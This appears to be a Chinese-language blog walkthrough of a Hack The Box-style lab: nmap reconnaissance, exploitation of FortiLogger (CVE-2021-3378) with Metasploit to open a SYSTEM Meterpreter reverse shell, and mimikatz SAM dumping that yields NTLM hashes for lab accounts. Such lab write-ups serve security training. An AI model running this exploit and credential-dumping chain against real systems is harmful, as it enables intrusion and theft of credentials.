每日一练
题目
解答
第一题
首先nmap扫描,收集一下信息。
┌──(root㉿HgTrojan)-[~]
└─# nmap -sV -sC 10.129.203.65
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 02:57 EST
Nmap scan report for 10.129.203.65
Host is up (0.66s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-01-26T07:58:43+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-51BJ97BCIPV
| NetBIOS_Domain_Name: WIN-51BJ97BCIPV
| NetBIOS_Computer_Name: WIN-51BJ97BCIPV
| DNS_Domain_Name: WIN-51BJ97BCIPV
| DNS_Computer_Name: WIN-51BJ97BCIPV
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-26T07:58:33+00:00
| ssl-cert: Subject: commonName=WIN-51BJ97BCIPV
| Not valid before: 2024-01-25T07:56:59
|_Not valid after: 2024-07-26T07:56:59
5000/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: FortiLogger | Log and Report System
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-26T07:58:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.72 seconds
我们发现该目标5000端口存在web服务“FortiLogger”
既然如此,那么我们先去Google搜索一下是否存在公开漏洞。
非常幸运,它确实存在公开漏洞并且可以被Metasploit直接利用,那么让我们来验证一下,我们的目标是否存在该漏洞。
┌──(root㉿HgTrojan)-[~]
└─# msfconsole
Metasploit tip: Network adapter names can be used for IP options set LHOST
eth0
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2021-3378
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/fortilogger_arbitrary_fileupload 2021-02-26 normal Yes FortiLogger Arbitrary File Upload Exploit
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/fortilogger_arbitrary_fileupload
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options
Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploi
t/basics/using-metasploit.html
RPORT 5000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the FortiLogger
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 FortiLogger < 5.2.0
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 10.129.203.65
rhosts => 10.129.203.65
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set lhost 10.10.16.25
lhost => 10.10.16.25
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > exploit
[*] Started reverse TCP handler on 10.10.16.25:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. FortiLogger version 4.4.2.2
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175686 bytes) to 10.129.203.65
[*] Meterpreter session 1 opened (10.10.16.25:4444 -> 10.129.203.65:49687) at 2024-01-26 03:11:39 -0500
meterpreter >
看来运气非常好,那么接下来就是获取shell并且查看获得 shell 的用户的用户名
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
到此第一题就完成了
第二题
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[!] Loaded x86 Kiwi on an x64 architecture.
Success.
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : WIN-51BJ97BCIPV
SysKey : c897d22c1c56490b453e326f86b2eef8
Local SID : S-1-5-21-2348711446-3829538955-3974936019
SAMKey : e52d743c76043bf814df6e48f1efcb23
RID : 000001f4 (500)
User : Administrator
Hash NTLM: bdaffbfe64f1fc646a3353be1c2c3c99
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : d0e507b237b40a3a1f62ba1935465406
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-51BJ97BCIPVAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 545c81812fc803221b22e47ab8789c104f38b151c677fbc4006894db6d174f1b
aes128_hmac (4096) : 5d59bcd0e74c5ed8951b9f2b658eef43
des_cbc_md5 (4096) : 76436b1c190d892a
OldCredentials
aes256_hmac (4096) : a394ab9b7c712a9e0f3edb58404f9cf086132d29ab5b796d937b197862331b07
aes128_hmac (4096) : 7630dab9bdaeebf9b4aa6c595347a0cc
des_cbc_md5 (4096) : 9876615285c2766e
OlderCredentials
aes256_hmac (4096) : 09c55a10e6b955caac4abbf7ff37b81488a2ede67a150c00c775fa00d94768ab
aes128_hmac (4096) : b49643128581ac08a1fae957f7787f72
des_cbc_md5 (4096) : d32592d63b75ec1f
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-51BJ97BCIPVAdministrator
Credentials
des_cbc_md5 : 76436b1c190d892a
OldCredentials
des_cbc_md5 : 9876615285c2766e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 4b4ba140ac0767077aee1958e7f78070
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 92793b2cbb0532b4fbea6c62ee1c72c8
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c34300ce936f766e6b0aca4191b93dfb576bbe9efa2d2888b3f275c74d7d9c55
aes128_hmac (4096) : 6b6a769c33971f0da23314d5cef8413e
des_cbc_md5 (4096) : 61299e7a768fa2d5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 61299e7a768fa2d5
RID : 000003ea (1002)
User : htb-student
Hash NTLM: cf3a5525ee9414229e66279623ed5c58
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : f88979e2a6999b5cbc7a9308e7b4cd82
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-51BJ97BCIPVhtb-student
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 1ed226feb91bfd21489a12a58c6cb38b99ab70feb30d971c8987fb44bcb15213
aes128_hmac (4096) : 629343148027bcf0d48cf49b066a9960
des_cbc_md5 (4096) : 379791d616ef6d0e
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-51BJ97BCIPVhtb-student
Credentials
des_cbc_md5 : 379791d616ef6d0e
meterpreter >
整理可得
RID : 000003ea (1002)
User : htb-student
Hash NTLM: cf3a5525ee9414229e66279623ed5c58
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : f88979e2a6999b5cbc7a9308e7b4cd82
检索“htb-student”用户的 NTLM 密码哈希为:cf3a5525ee9414229e66279623ed5c58
打赏: 支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!